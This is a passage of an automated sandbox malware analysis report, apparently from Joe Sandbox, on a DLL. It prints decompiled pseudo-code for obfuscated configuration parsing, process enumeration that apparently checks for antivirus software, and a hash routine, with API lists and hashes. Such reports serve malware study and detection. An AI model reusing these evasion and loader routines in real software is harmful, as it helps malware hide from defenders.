                                  • Part of subcall function 00D47EA4: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00D451D4,004F0053,00000000,?), ref: 00D47EAD
                                  • Part of subcall function 00D47EA4: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00D451D4,004F0053,00000000,?), ref: 00D47ED7
                                  • Part of subcall function 00D47EA4: memset.NTDLL ref: 00D47EEB
                                • SysFreeString.OLEAUT32(00000000), ref: 00D4109A
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: FreeString$lstrlenmemcpymemset
                                • String ID:
                                • API String ID: 397948122-0
                                • Opcode ID: 3a48d5a558bfc9225dfdcf8cacbb40b5000d4a568cb3f5829a53b7c184db06d9
                                • Instruction ID: 370781b9736ebf4c1ac5a804c004785684758394169eb1ad68b511446c20e911
                                • Opcode Fuzzy Hash: 3a48d5a558bfc9225dfdcf8cacbb40b5000d4a568cb3f5829a53b7c184db06d9
                                • Instruction Fuzzy Hash: EE017C36900159BFDB529FA9CC04EAABBB9FB05350F004565F900E7161E771DD95C7B0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 37%
                                			E1000196B(void* __eax, intOrPtr _a4) {
                                
                                				 *0x10004150 =  *0x10004150 & 0x00000000;
                                				_push(0);
                                				_push(0x1000414c);
                                				_push(1);
                                				_push(_a4);
                                				 *0x10004148 = 0xc; // executed
                                				L10002010(); // executed
                                				return __eax;
                                			}

                                APIs
                                • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(100016C7,00000001,1000414C,00000000), ref: 10001989
                                Memory Dump Source
                                • Source File: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.797669903.0000000010005000.00000040.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: DescriptorSecurity$ConvertString
                                • String ID:
                                • API String ID: 3907675253-0
                                • Opcode ID: 1993c95c5950e5545ff5e0ff84ea07d39106e86980e244a61008a792b8d983ba
                                • Instruction ID: 282e5bb9558e7c36415e3b38fee0fcfa39ed5af610658c9955217df824f70e77
                                • Opcode Fuzzy Hash: 1993c95c5950e5545ff5e0ff84ea07d39106e86980e244a61008a792b8d983ba
                                • Instruction Fuzzy Hash: EBC04CF8140750A7F620DB408C85FC57A51B7A4785F120504F650251E9CBB510D4951D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                C-Code - Quality: 96%
                                			E00D47FBE(int* __ecx) {
                                				int _v8;
                                				void* _v12;
                                				void* _v16;
                                				void* __esi;
                                				signed int _t28;
                                				signed int _t33;
                                				signed int _t39;
                                				char* _t45;
                                				char* _t46;
                                				char* _t47;
                                				char* _t48;
                                				char* _t49;
                                				char* _t50;
                                				void* _t51;
                                				void* _t52;
                                				void* _t53;
                                				intOrPtr _t54;
                                				void* _t56;
                                				intOrPtr _t57;
                                				intOrPtr _t58;
                                				signed int _t61;
                                				intOrPtr _t64;
                                				signed int _t65;
                                				signed int _t70;
                                				void* _t72;
                                				void* _t73;
                                				signed int _t75;
                                				signed int _t78;
                                				signed int _t82;
                                				signed int _t86;
                                				signed int _t90;
                                				signed int _t94;
                                				signed int _t98;
                                				void* _t103;
                                				intOrPtr _t121;
                                
                                				_t104 = __ecx;
                                				_t28 =  *0xd4d2a4; // 0x69b25f44
                                				if(E00D46247( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x90) {
                                					 *0xd4d2d8 = _v8;
                                				}
                                				_t33 =  *0xd4d2a4; // 0x69b25f44
                                				if(E00D46247( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
                                					_v12 = 2;
                                					L69:
                                					return _v12;
                                				}
                                				_t39 =  *0xd4d2a4; // 0x69b25f44
                                				if(E00D46247( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
                                					L67:
                                					HeapFree( *0xd4d238, 0, _v16);
                                					goto L69;
                                				} else {
                                					_t103 = _v12;
                                					if(_t103 == 0) {
                                						_t45 = 0;
                                					} else {
                                						_t98 =  *0xd4d2a4; // 0x69b25f44
                                						_t45 = E00D49403(_t104, _t103, _t98 ^ 0x7895433b);
                                					}
                                					if(_t45 != 0) {
                                						_t104 =  &_v8;
                                						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                                							 *0xd4d240 = _v8;
                                						}
                                					}
                                					if(_t103 == 0) {
                                						_t46 = 0;
                                					} else {
                                						_t94 =  *0xd4d2a4; // 0x69b25f44
                                						_t46 = E00D49403(_t104, _t103, _t94 ^ 0x219b08c7);
                                					}
                                					if(_t46 != 0) {
                                						_t104 =  &_v8;
                                						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                                							 *0xd4d244 = _v8;
                                						}
                                					}
                                					if(_t103 == 0) {
                                						_t47 = 0;
                                					} else {
                                						_t90 =  *0xd4d2a4; // 0x69b25f44
                                						_t47 = E00D49403(_t104, _t103, _t90 ^ 0x31fc0661);
                                					}
                                					if(_t47 != 0) {
                                						_t104 =  &_v8;
                                						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                                							 *0xd4d248 = _v8;
                                						}
                                					}
                                					if(_t103 == 0) {
                                						_t48 = 0;
                                					} else {
                                						_t86 =  *0xd4d2a4; // 0x69b25f44
                                						_t48 = E00D49403(_t104, _t103, _t86 ^ 0x0cd926ce);
                                					}
                                					if(_t48 != 0) {
                                						_t104 =  &_v8;
                                						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
                                							 *0xd4d004 = _v8;
                                						}
                                					}
                                					if(_t103 == 0) {
                                						_t49 = 0;
                                					} else {
                                						_t82 =  *0xd4d2a4; // 0x69b25f44
                                						_t49 = E00D49403(_t104, _t103, _t82 ^ 0x3cd8b2cb);
                                					}
                                					if(_t49 != 0) {
                                						_t104 =  &_v8;
                                						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
                                							 *0xd4d02c = _v8;
                                						}
                                					}
                                					if(_t103 == 0) {
                                						_t50 = 0;
                                					} else {
                                						_t78 =  *0xd4d2a4; // 0x69b25f44
                                						_t50 = E00D49403(_t104, _t103, _t78 ^ 0x2878b929);
                                					}
                                					if(_t50 == 0) {
                                						L41:
                                						 *0xd4d24c = 5;
                                						goto L42;
                                					} else {
                                						_t104 =  &_v8;
                                						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
                                							goto L41;
                                						} else {
                                							L42:
                                							if(_t103 == 0) {
                                								_t51 = 0;
                                							} else {
                                								_t75 =  *0xd4d2a4; // 0x69b25f44
                                								_t51 = E00D49403(_t104, _t103, _t75 ^ 0x261a367a);
                                							}
                                							if(_t51 != 0) {
                                								_push(_t51);
                                								_t72 = 0x10;
                                								_t73 = E00D4A0FD(_t72);
                                								if(_t73 != 0) {
                                									_push(_t73);
                                									E00D49FF6();
                                								}
                                							}
                                							if(_t103 == 0) {
                                								_t52 = 0;
                                							} else {
                                								_t70 =  *0xd4d2a4; // 0x69b25f44
                                								_t52 = E00D49403(_t104, _t103, _t70 ^ 0xb9d404b2);
                                							}
                                							if(_t52 != 0 && E00D4A0FD(0, _t52) != 0) {
                                								_t121 =  *0xd4d32c; // 0x32895b0
                                								E00D41128(_t121 + 4, _t68);
                                							}
                                							if(_t103 == 0) {
                                								_t53 = 0;
                                							} else {
                                								_t65 =  *0xd4d2a4; // 0x69b25f44
                                								_t53 = E00D49403(_t104, _t103, _t65 ^ 0x3df17130);
                                							}
                                							if(_t53 == 0) {
                                								L59:
                                								_t54 =  *0xd4d2a8; // 0x253a5a8
                                								_t22 = _t54 + 0xd4e252; // 0x616d692f
                                								 *0xd4d2d4 = _t22;
                                								goto L60;
                                							} else {
                                								_t64 = E00D4A0FD(0, _t53);
                                								 *0xd4d2d4 = _t64;
                                								if(_t64 != 0) {
                                									L60:
                                									if(_t103 == 0) {
                                										_t56 = 0;
                                									} else {
                                										_t61 =  *0xd4d2a4; // 0x69b25f44
                                										_t56 = E00D49403(_t104, _t103, _t61 ^ 0xd2079859);
                                									}
                                									if(_t56 == 0) {
                                										_t57 =  *0xd4d2a8; // 0x253a5a8
                                										_t23 = _t57 + 0xd4e791; // 0x6976612e
                                										_t58 = _t23;
                                									} else {
                                										_t58 = E00D4A0FD(0, _t56);
                                									}
                                									 *0xd4d340 = _t58;
                                									HeapFree( *0xd4d238, 0, _t103);
                                									_v12 = 0;
                                									goto L67;
                                								}
                                								goto L59;
                                							}
                                						}
                                					}
                                				}
                                			}

                                APIs
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,00D430F3,?,69B25F44,?,00D430F3,69B25F44,?,00D430F3,69B25F44,00000005,00D4D00C,00000008), ref: 00D48063
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,00D430F3,?,69B25F44,?,00D430F3,69B25F44,?,00D430F3,69B25F44,00000005,00D4D00C,00000008), ref: 00D48095
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,00D430F3,?,69B25F44,?,00D430F3,69B25F44,?,00D430F3,69B25F44,00000005,00D4D00C,00000008), ref: 00D480C7
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,00D430F3,?,69B25F44,?,00D430F3,69B25F44,?,00D430F3,69B25F44,00000005,00D4D00C,00000008), ref: 00D480F9
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,00D430F3,?,69B25F44,?,00D430F3,69B25F44,?,00D430F3,69B25F44,00000005,00D4D00C,00000008), ref: 00D4812B
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,00D430F3,?,69B25F44,?,00D430F3,69B25F44,?,00D430F3,69B25F44,00000005,00D4D00C,00000008), ref: 00D4815D
                                • HeapFree.KERNEL32(00000000,00D430F3,00D430F3,?,69B25F44,?,00D430F3,69B25F44,?,00D430F3,69B25F44,00000005,00D4D00C,00000008,?,00D430F3), ref: 00D4825B
                                • HeapFree.KERNEL32(00000000,?,00D430F3,?,69B25F44,?,00D430F3,69B25F44,?,00D430F3,69B25F44,00000005,00D4D00C,00000008,?,00D430F3), ref: 00D4826E
                                  • Part of subcall function 00D4A0FD: lstrlen.KERNEL32(69B25F44,00000000,7673D3B0,00D430F3,00D48241,00000000,00D430F3,?,69B25F44,?,00D430F3,69B25F44,?,00D430F3,69B25F44,00000005), ref: 00D4A106
                                  • Part of subcall function 00D4A0FD: memcpy.NTDLL(00000000,?,00000000,00000001,?,00D430F3), ref: 00D4A129
                                  • Part of subcall function 00D4A0FD: memset.NTDLL ref: 00D4A138
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: FreeHeap$lstrlenmemcpymemset
                                • String ID: Ut
                                • API String ID: 3442150357-8415677
                                • Opcode ID: 65bd29188c89d3f3dde99af875cf11ad41e69f002adca64800d27b3489aa4d0e
                                • Instruction ID: 5784c58ef8dc62bf659a0a823f240bae0c6517ab77a87ec729a0f8750fdee050
                                • Opcode Fuzzy Hash: 65bd29188c89d3f3dde99af875cf11ad41e69f002adca64800d27b3489aa4d0e
                                • Instruction Fuzzy Hash: 3D817F78A10704AFCB10EFB8CDC496F76AEEB49780B280926E405D7315EE75D946A734
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E10001EE5() {
                                				void* _t1;
                                				unsigned int _t3;
                                				void* _t4;
                                				long _t5;
                                				void* _t6;
                                				intOrPtr _t10;
                                				void* _t14;
                                
                                				_t10 =  *0x10004130;
                                				_t1 = CreateEventA(0, 1, 0, 0);
                                				 *0x1000413c = _t1;
                                				if(_t1 == 0) {
                                					return GetLastError();
                                				}
                                				_t3 = GetVersion();
                                				if(_t3 != 5) {
                                					L4:
                                					if(_t14 <= 0) {
                                						_t4 = 0x32;
                                						return _t4;
                                					} else {
                                						goto L5;
                                					}
                                				} else {
                                					if(_t3 >> 8 > 0) {
                                						L5:
                                						 *0x1000412c = _t3;
                                						_t5 = GetCurrentProcessId();
                                						 *0x10004128 = _t5;
                                						 *0x10004130 = _t10;
                                						_t6 = OpenProcess(0x10047a, 0, _t5);
                                						 *0x10004124 = _t6;
                                						if(_t6 == 0) {
                                							 *0x10004124 =  *0x10004124 | 0xffffffff;
                                						}
                                						return 0;
                                					} else {
                                						_t14 = _t3 - _t3;
                                						goto L4;
                                					}
                                				}
                                			}











                                APIs
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,1000154B), ref: 10001EF4
                                • GetVersion.KERNEL32 ref: 10001F03
                                • GetCurrentProcessId.KERNEL32 ref: 10001F1F
                                • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 10001F38
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.797669903.0000000010005000.00000040.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CreateCurrentEventOpenVersion
                                • String ID: @Mt MtTt
                                • API String ID: 845504543-608512568
                                • Opcode ID: 71d23d898772f397a204b1a7459d48f648326283fe838bef3ee78d2eb13f1070
                                • Instruction ID: ea10dc5c802a680a8ba8bb0f8edc734978800e41233c6741bbe9ab65d3b2f1fa
                                • Opcode Fuzzy Hash: 71d23d898772f397a204b1a7459d48f648326283fe838bef3ee78d2eb13f1070
                                • Instruction Fuzzy Hash: 77F0C2B0641332DBF7019F68AD9A7D63BE4E7097D2F028125F641C61ECDBB084918B5C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 68%
                                			E00D48F1B() {
                                				char _v264;
                                				void* _v300;
                                				int _t8;
                                				intOrPtr _t9;
                                				int _t15;
                                				void* _t17;
                                
                                				_t15 = 0;
                                				_t17 = CreateToolhelp32Snapshot(2, 0);
                                				if(_t17 != 0) {
                                					_t8 = Process32First(_t17,  &_v300);
                                					while(_t8 != 0) {
                                						_t9 =  *0xd4d2a8; // 0x253a5a8
                                						_t2 = _t9 + 0xd4ee34; // 0x73617661
                                						_push( &_v264);
                                						if( *0xd4d0fc() != 0) {
                                							_t15 = 1;
                                						} else {
                                							_t8 = Process32Next(_t17,  &_v300);
                                							continue;
                                						}
                                						L7:
                                						CloseHandle(_t17);
                                						goto L8;
                                					}
                                					goto L7;
                                				}
                                				L8:
                                				return _t15;
                                			}










                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00D48F2B
                                • Process32First.KERNEL32(00000000,?), ref: 00D48F3E
                                • Process32Next.KERNEL32(00000000,?), ref: 00D48F6A
                                • CloseHandle.KERNEL32(00000000), ref: 00D48F79
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                • String ID:
                                • API String ID: 420147892-0
                                • Opcode ID: 8c7fc040277b226b0986dc1a9722d30bdf0043fa810ade4ad1e2645cb82f7950
                                • Instruction ID: bf3e5e571abe7d27ce4a7da58b82999492d2cd5c3d56e3a4ec2dc3775b61af86
                                • Opcode Fuzzy Hash: 8c7fc040277b226b0986dc1a9722d30bdf0043fa810ade4ad1e2645cb82f7950
                                • Instruction Fuzzy Hash: D8F0B4366012286BEB20BB668C49DEFB7AEDFC6750F040161F945E3105EE30DA4996B5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.795811026.0000000000910000.00000040.00000001.sdmp, Offset: 00910000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_910000_loaddll32.jbxd
                                Similarity
                                • API ID:
                                • String ID: t32c$t32c
                                • API String ID: 0-1046649395
                                • Opcode ID: 0c853d85831891ca95221df78244bfe9110112b610d694c0f5ca411909319447
                                • Instruction ID: d1c0d48357668c8d0d9e64de2a26eefd8d01bb3bfd1e2a0526d55043e2e43588
                                • Opcode Fuzzy Hash: 0c853d85831891ca95221df78244bfe9110112b610d694c0f5ca411909319447
                                • Instruction Fuzzy Hash: C1815736A0021ADFDF24CF50DD84BA9B7B9FF88324F198595D8096B216D371AEC5DB40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 49%
                                			E00D4836E(void* __ecx, intOrPtr* _a4) {
                                				signed int _v8;
                                				signed int _v12;
                                				intOrPtr _v16;
                                				intOrPtr _v20;
                                				intOrPtr _v24;
                                				intOrPtr _v28;
                                				intOrPtr _v32;
                                				intOrPtr _v36;
                                				intOrPtr _v40;
                                				intOrPtr _v44;
                                				intOrPtr _v48;
                                				intOrPtr _v52;
                                				intOrPtr _v56;
                                				intOrPtr _v60;
                                				intOrPtr _v64;
                                				intOrPtr _v68;
                                				intOrPtr _v72;
                                				void _v76;
                                				intOrPtr* _t226;
                                				signed int _t229;
                                				signed int _t231;
                                				signed int _t233;
                                				signed int _t235;
                                				signed int _t237;
                                				signed int _t239;
                                				signed int _t241;
                                				signed int _t243;
                                				signed int _t245;
                                				signed int _t247;
                                				signed int _t249;
                                				signed int _t251;
                                				signed int _t253;
                                				signed int _t255;
                                				signed int _t257;
                                				signed int _t259;
                                				signed int _t338;
                                				signed char* _t348;
                                				signed int _t349;
                                				signed int _t351;
                                				signed int _t353;
                                				signed int _t355;
                                				signed int _t357;
                                				signed int _t359;
                                				signed int _t361;
                                				signed int _t363;
                                				signed int _t365;
                                				signed int _t367;
                                				signed int _t376;
                                				signed int _t378;
                                				signed int _t380;
                                				signed int _t382;
                                				signed int _t384;
                                				intOrPtr* _t400;
                                				signed int* _t401;
                                				signed int _t402;
                                				signed int _t404;
                                				signed int _t406;
                                				signed int _t408;
                                				signed int _t410;
                                				signed int _t412;
                                				signed int _t414;
                                				signed int _t416;
                                				signed int _t418;
                                				signed int _t420;
                                				signed int _t422;
                                				signed int _t424;
                                				signed int _t432;
                                				signed int _t434;
                                				signed int _t436;
                                				signed int _t438;
                                				signed int _t440;
                                				signed int _t508;
                                				signed int _t599;
                                				signed int _t607;
                                				signed int _t613;
                                				signed int _t679;
                                				void* _t682;
                                				signed int _t683;
                                				signed int _t685;
                                				signed int _t690;
                                				signed int _t692;
                                				signed int _t697;
                                				signed int _t699;
                                				signed int _t718;
                                				signed int _t720;
                                				signed int _t722;
                                				signed int _t724;
                                				signed int _t726;
                                				signed int _t728;
                                				signed int _t734;
                                				signed int _t740;
                                				signed int _t742;
                                				signed int _t744;
                                				signed int _t746;
                                				signed int _t748;
                                
                                				_t226 = _a4;
                                				_t348 = __ecx + 2;
                                				_t401 =  &_v76;
                                				_t682 = 0x10;
                                				do {
                                					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
                                					_t401 =  &(_t401[1]);
                                					_t348 =  &(_t348[4]);
                                					_t682 = _t682 - 1;
                                				} while (_t682 != 0);
                                				_t6 = _t226 + 4; // 0x14eb3fc3
                                				_t683 =  *_t6;
                                				_t7 = _t226 + 8; // 0x8d08458b
                                				_t402 =  *_t7;
                                				_t8 = _t226 + 0xc; // 0x56c1184c
                                				_t349 =  *_t8;
                                				asm("rol eax, 0x7");
                                				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
                                				asm("rol ecx, 0xc");
                                				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
                                				asm("ror edx, 0xf");
                                				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
                                				asm("ror esi, 0xa");
                                				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
                                				_v8 = _t685;
                                				_t690 = _v8;
                                				asm("rol eax, 0x7");
                                				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
                                				asm("rol ecx, 0xc");
                                				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
                                				asm("ror edx, 0xf");
                                				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
                                				asm("ror esi, 0xa");
                                				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
                                				_v8 = _t692;
                                				_t697 = _v8;
                                				asm("rol eax, 0x7");
                                				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
                                				asm("rol ecx, 0xc");
                                				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
                                				asm("ror edx, 0xf");
                                				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
                                				asm("ror esi, 0xa");
                                				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
                                				_v8 = _t699;
                                				asm("rol eax, 0x7");
                                				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
                                				asm("rol ecx, 0xc");
                                				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
                                				_t508 =  !_t357;
                                				asm("ror edx, 0xf");
                                				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
                                				_v12 = _t410;
                                				_v12 =  !_v12;
                                				asm("ror esi, 0xa");
                                				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
                                				asm("rol eax, 0x5");
                                				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
                                				asm("rol ecx, 0x9");
                                				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
                                				asm("rol edx, 0xe");
                                				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
                                				asm("ror esi, 0xc");
                                				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
                                				asm("rol eax, 0x5");
                                				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
                                				asm("rol ecx, 0x9");
                                				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
                                				asm("rol edx, 0xe");
                                				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
                                				asm("ror esi, 0xc");
                                				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
                                				asm("rol eax, 0x5");
                                				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
                                				asm("rol ecx, 0x9");
                                				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
                                				asm("rol edx, 0xe");
                                				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
                                				asm("ror esi, 0xc");
                                				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
                                				asm("rol eax, 0x5");
                                				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
                                				asm("rol ecx, 0x9");
                                				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
                                				asm("rol edx, 0xe");
                                				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
                                				asm("ror esi, 0xc");
                                				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
                                				asm("rol eax, 0x4");
                                				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
                                				asm("rol ecx, 0xb");
                                				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
                                				asm("rol edx, 0x10");
                                				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
                                				_t599 = _t367 ^ _t420;
                                				asm("ror esi, 0x9");
                                				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
                                				asm("rol eax, 0x4");
                                				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
                                				asm("rol edi, 0xb");
                                				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
                                				asm("rol edx, 0x10");
                                				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
                                				_t338 = _t607 ^ _t422;
                                				asm("ror ecx, 0x9");
                                				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
                                				asm("rol eax, 0x4");
                                				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
                                				asm("rol esi, 0xb");
                                				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
                                				asm("rol edi, 0x10");
                                				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
                                				_t424 = _t734 ^ _t613;
                                				asm("ror ecx, 0x9");
                                				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
                                				asm("rol eax, 0x4");
                                				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
                                				asm("rol edx, 0xb");
                                				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
                                				asm("rol esi, 0x10");
                                				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
                                				asm("ror ecx, 0x9");
                                				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
                                				asm("rol eax, 0x6");
                                				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
                                				asm("rol edx, 0xa");
                                				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
                                				asm("rol esi, 0xf");
                                				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
                                				asm("ror ecx, 0xb");
                                				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
                                				asm("rol eax, 0x6");
                                				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
                                				asm("rol edx, 0xa");
                                				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
                                				asm("rol esi, 0xf");
                                				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
                                				asm("ror ecx, 0xb");
                                				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
                                				asm("rol eax, 0x6");
                                				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
                                				asm("rol edx, 0xa");
                                				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
                                				asm("rol esi, 0xf");
                                				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
                                				asm("ror edi, 0xb");
                                				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
                                				asm("rol eax, 0x6");
